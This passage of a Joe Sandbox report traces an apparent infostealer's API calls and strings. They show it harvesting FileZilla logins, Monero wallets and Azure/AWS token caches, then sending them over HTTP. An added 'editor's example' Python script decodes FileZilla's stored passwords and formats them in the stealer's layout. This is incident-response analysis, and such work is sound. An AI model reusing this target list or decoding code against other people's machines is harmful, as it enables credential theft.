                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: 83625a9e86b815ba680cfa3779fb041488ce82446cfb97b18980849cf66a5cf4
                            • Instruction ID: 8a6910799b18b37f266b28bce48ef6ea61a5ea4c40d78233e29aed46184a43a1
                            • Opcode Fuzzy Hash: 83625a9e86b815ba680cfa3779fb041488ce82446cfb97b18980849cf66a5cf4
                            • Instruction Fuzzy Hash: F0D12B72900208ABCB14EBE0DE9AEEE7378FF14304F54552DF106B6185DA76AA07CB61
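Editor's worked example, not part of the Joe Sandbox report and not code from the sample: the function above opens \AppData\Roaming\FileZilla\recentservers.xml, scans it with StrStrA for <Host>, <Port>, <User> and <Pass encoding="base64">, and concatenates the result into "browser: FileZilla / profile: null / url: / login: / password:" records. For a responder the useful question is which stored FileZilla credentials were exposed and must be rotated. The script below parses the same file with a real XML parser, decodes the base64 passwords, and can render an entry in the record layout seen in the string table. The XML is constructed for the example; the ":" between host and port in the url line is an assumption, since the report only shows the labels, and the %APPDATA% default path follows the path suffix in the string table.

```python
"""Added example (editor's code, not the report's or the sample's):
list the FileZilla credentials a stealer with this module could harvest."""
import base64
import os
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample that mirrors the layout of FileZilla's recentservers.xml.
SAMPLE_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.invalid</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.invalid</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>alice</User>
      <Logontype>2</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


@dataclass(frozen=True)
class FzCredential:
    host: str
    port: int
    user: str
    password: Optional[str]   # None when no <Pass> element is stored


def parse_recentservers(data: bytes) -> List[FzCredential]:
    """Return every <Server> entry, decoding a base64-encoded <Pass>."""
    root = ET.fromstring(data)
    creds = []
    for server in root.iter("Server"):
        host = (server.findtext("Host") or "").strip()
        if not host:
            continue
        port = int(server.findtext("Port") or "0")
        user = (server.findtext("User") or "").strip()
        pass_el = server.find("Pass")
        password = None
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                password = base64.b64decode(pass_el.text).decode("utf-8", "replace")
            else:
                password = pass_el.text   # older FileZilla builds wrote plaintext
        creds.append(FzCredential(host, port, user, password))
    return creds


def exposed_credentials(creds: List[FzCredential]) -> List[FzCredential]:
    """Entries with a stored password: these are the ones to rotate."""
    return [c for c in creds if c.password is not None]


def format_stealer_style(c: FzCredential) -> str:
    """Render one entry with the labels from the sample's string table.
    The host:port join is an assumption; the report shows only the labels."""
    return "\n".join([
        "browser: FileZilla",
        "profile: null",
        f"url: {c.host}:{c.port}",
        f"login: {c.user}",
        f"password: {c.password or ''}",
    ])


def default_path() -> str:
    # %APPDATA% resolves to <profile>\AppData\Roaming, matching the suffix
    # \AppData\Roaming\FileZilla\recentservers.xml in the string table.
    return os.path.join(os.environ.get("APPDATA", ""), "FileZilla", "recentservers.xml")


if __name__ == "__main__":
    for cred in exposed_credentials(parse_recentservers(SAMPLE_XML)):
        print(f"rotate: {cred.user}@{cred.host}:{cred.port}")
```

On a real host point parse_recentservers at the bytes of default_path(); sitemanager.xml in the same directory uses the same <Server> layout and can be checked the same way.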
                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EB4839
                              • Part of subcall function 00EB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EB4849
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EB59F8
                            • StrCmpCA.SHLWAPI(?,00A9E3D0), ref: 00EB5A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EB5B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00A9E410,00000000,?,00A9C958,00000000,?,00ED1A1C), ref: 00EB5E71
                            • lstrlen.KERNEL32(00000000), ref: 00EB5E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00EB5E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EB5E9A
                            • lstrlen.KERNEL32(00000000), ref: 00EB5EAF
                            • lstrlen.KERNEL32(00000000), ref: 00EB5ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EB5EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00EB5F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EB5F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00EB5F4C
                            • InternetCloseHandle.WININET(00000000), ref: 00EB5FB0
                            • InternetCloseHandle.WININET(00000000), ref: 00EB5FBD
                            • HttpOpenRequestA.WININET(00000000,00A9E3F0,?,00A9DC50,00000000,00000000,00400100,00000000), ref: 00EB5BF8
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • InternetCloseHandle.WININET(00000000), ref: 00EB5FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: dc6b22a484ecc2f2828c4ea2873942ef5dec5dd44fdbb10908b40ed0d8750aeb
                            • Instruction ID: c18e1698a2a0a21e13aff5037e93799127c2b4ad90187be5e29a140b0dfefc88
                            • Opcode Fuzzy Hash: dc6b22a484ecc2f2828c4ea2873942ef5dec5dd44fdbb10908b40ed0d8750aeb
                            • Instruction Fuzzy Hash: 86120E7291011CABCB18EBA0DD9AFEE73B8BF54704F4451ADB10A72091DF312A4ACF55
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00EC8B60: GetSystemTime.KERNEL32(00ED0E1A,00A9C988,00ED05AE,?,?,00EB13F9,?,0000001A,00ED0E1A,00000000,?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00EC8B86
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EBCF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EBD0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EBD0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD208
                            • lstrcat.KERNEL32(?,00ED1478), ref: 00EBD217
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD22A
                            • lstrcat.KERNEL32(?,00ED147C), ref: 00EBD239
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD24C
                            • lstrcat.KERNEL32(?,00ED1480), ref: 00EBD25B
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD26E
                            • lstrcat.KERNEL32(?,00ED1484), ref: 00EBD27D
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD290
                            • lstrcat.KERNEL32(?,00ED1488), ref: 00EBD29F
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD2B2
                            • lstrcat.KERNEL32(?,00ED148C), ref: 00EBD2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD2D4
                            • lstrcat.KERNEL32(?,00ED1490), ref: 00EBD2E3
                              • Part of subcall function 00ECA820: lstrlen.KERNEL32(00EB4F05,?,?,00EB4F05,00ED0DDE), ref: 00ECA82B
                              • Part of subcall function 00ECA820: lstrcpy.KERNEL32(00ED0DDE,00000000), ref: 00ECA885
                            • lstrlen.KERNEL32(?), ref: 00EBD32A
                            • lstrlen.KERNEL32(?), ref: 00EBD339
                              • Part of subcall function 00ECAA70: StrCmpCA.SHLWAPI(00A98A48,00EBA7A7,?,00EBA7A7,00A98A48), ref: 00ECAA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 00EBD3B4
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: f8d61afc0a2446475862a7f6bc27cdcb79c24d991f130d74b6648af94cae9ea5
                            • Instruction ID: 53cf48a9ece38414bab9895a49817cf266ac3847dc25900557aa16f679be6c23
                            • Opcode Fuzzy Hash: f8d61afc0a2446475862a7f6bc27cdcb79c24d991f130d74b6648af94cae9ea5
                            • Instruction Fuzzy Hash: 66E11172910108ABCB18EBA0DE9AEEE73B8BF54304F14516DF506B7191DE366A07CB61
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00A9C630,00000000,?,00ED144C,00000000,?,?), ref: 00EBCA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00EBCA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00EBCA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EBCAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00EBCAD9
                            • StrStrA.SHLWAPI(?,00A9C6F0,00ED0B52), ref: 00EBCAF7
                            • StrStrA.SHLWAPI(00000000,00A9C678), ref: 00EBCB1E
                            • StrStrA.SHLWAPI(?,00A9D580,00000000,?,00ED1458,00000000,?,00000000,00000000,?,00A98A18,00000000,?,00ED1454,00000000,?), ref: 00EBCCA2
                            • StrStrA.SHLWAPI(00000000,00A9D660), ref: 00EBCCB9
                              • Part of subcall function 00EBC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00EBC871
                              • Part of subcall function 00EBC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EBC87C
                            • StrStrA.SHLWAPI(?,00A9D660,00000000,?,00ED145C,00000000,?,00000000,00A989D8), ref: 00EBCD5A
                            • StrStrA.SHLWAPI(00000000,00A98888), ref: 00EBCD71
                              • Part of subcall function 00EBC820: lstrcat.KERNEL32(?,00ED0B46), ref: 00EBC943
                              • Part of subcall function 00EBC820: lstrcat.KERNEL32(?,00ED0B47), ref: 00EBC957
                              • Part of subcall function 00EBC820: lstrcat.KERNEL32(?,00ED0B4E), ref: 00EBC978
                            • lstrlen.KERNEL32(00000000), ref: 00EBCE44
                            • CloseHandle.KERNEL32(00000000), ref: 00EBCE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: 1f32e48065eabc826a33a4aa7e6ee0dafdd24d57ccd74cb6e5f576807145fbd0
                            • Instruction ID: 2e0a8d90ae55402fc6b1a921b8dfc4254f9c327726d1c484e9c5d0b8ce45a0ad
                            • Opcode Fuzzy Hash: 1f32e48065eabc826a33a4aa7e6ee0dafdd24d57ccd74cb6e5f576807145fbd0
                            • Instruction Fuzzy Hash: A5E1097290010CABDB18EBA0DD96FEEB7B8AF54304F04516DF10677191EE366A4BCB61
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • RegOpenKeyExA.ADVAPI32(00000000,00A9A1C0,00000000,00020019,00000000,00ED05B6), ref: 00EC83A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EC8426
                            • wsprintfA.USER32 ref: 00EC8459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EC847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC8499
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: 5a425601a888b58353ff7d552e37e760453760e04c19ae4e80d72fec96f3a42d
                            • Instruction ID: 43a35f07c571ba4ca774858669456dbbc773462ebce4397c17c2b5f1e8e40e37
                            • Opcode Fuzzy Hash: 5a425601a888b58353ff7d552e37e760453760e04c19ae4e80d72fec96f3a42d
                            • Instruction Fuzzy Hash: 0E811C7291011C9BDB28DB54CE95FEAB7B8FB48704F00929DE109A7140DF766A86CF94
                            APIs
                              • Part of subcall function 00EC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EC8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC4DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00EC4DCD
                              • Part of subcall function 00EC4910: wsprintfA.USER32 ref: 00EC492C
                              • Part of subcall function 00EC4910: FindFirstFileA.KERNEL32(?,?), ref: 00EC4943
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC4E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00EC4E59
                              • Part of subcall function 00EC4910: StrCmpCA.SHLWAPI(?,00ED0FDC), ref: 00EC4971
                              • Part of subcall function 00EC4910: StrCmpCA.SHLWAPI(?,00ED0FE0), ref: 00EC4987
                              • Part of subcall function 00EC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00EC4B7D
                              • Part of subcall function 00EC4910: FindClose.KERNEL32(000000FF), ref: 00EC4B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC4EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00EC4EE5
                              • Part of subcall function 00EC4910: wsprintfA.USER32 ref: 00EC49B0
                              • Part of subcall function 00EC4910: StrCmpCA.SHLWAPI(?,00ED08D2), ref: 00EC49C5
                              • Part of subcall function 00EC4910: wsprintfA.USER32 ref: 00EC49E2
                              • Part of subcall function 00EC4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00EC4A1E
                              • Part of subcall function 00EC4910: lstrcat.KERNEL32(?,00A9E400), ref: 00EC4A4A
                              • Part of subcall function 00EC4910: lstrcat.KERNEL32(?,00ED0FF8), ref: 00EC4A5C
                              • Part of subcall function 00EC4910: lstrcat.KERNEL32(?,?), ref: 00EC4A70
                              • Part of subcall function 00EC4910: lstrcat.KERNEL32(?,00ED0FFC), ref: 00EC4A82
                              • Part of subcall function 00EC4910: lstrcat.KERNEL32(?,?), ref: 00EC4A96
                              • Part of subcall function 00EC4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00EC4AAC
                              • Part of subcall function 00EC4910: DeleteFileA.KERNEL32(?), ref: 00EC4B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: bcbc459ecc7340ab647c76efb89eb66c79b5ed470c38c711614abc564224bdcf
                            • Instruction ID: 9964f1b418c49128ccc79f0b411f8a8ea52d7cf5884bd5fe082b6c034c5ea1eb
                            • Opcode Fuzzy Hash: bcbc459ecc7340ab647c76efb89eb66c79b5ed470c38c711614abc564224bdcf
                            • Instruction Fuzzy Hash: C041B6BAA4030867C720F770ED57FED3778AB64700F405498B189B61C1EDB55BCA8BA2
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00EC906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: 2e64f25cb5614e449c45859c19a2551e982609e232547062a827499123e9df17
                            • Instruction ID: 28d0b94713fc3744cbcb3604173b4e491ebd956d79d1dc5acc784f5dea237c7c
                            • Opcode Fuzzy Hash: 2e64f25cb5614e449c45859c19a2551e982609e232547062a827499123e9df17
                            • Instruction Fuzzy Hash: E071ED75A10208EBDB14DFE4D999FEEB7B8BF48700F10850CF55AA7284DB79A905CB60
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00EC31C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00EC335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00EC34EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
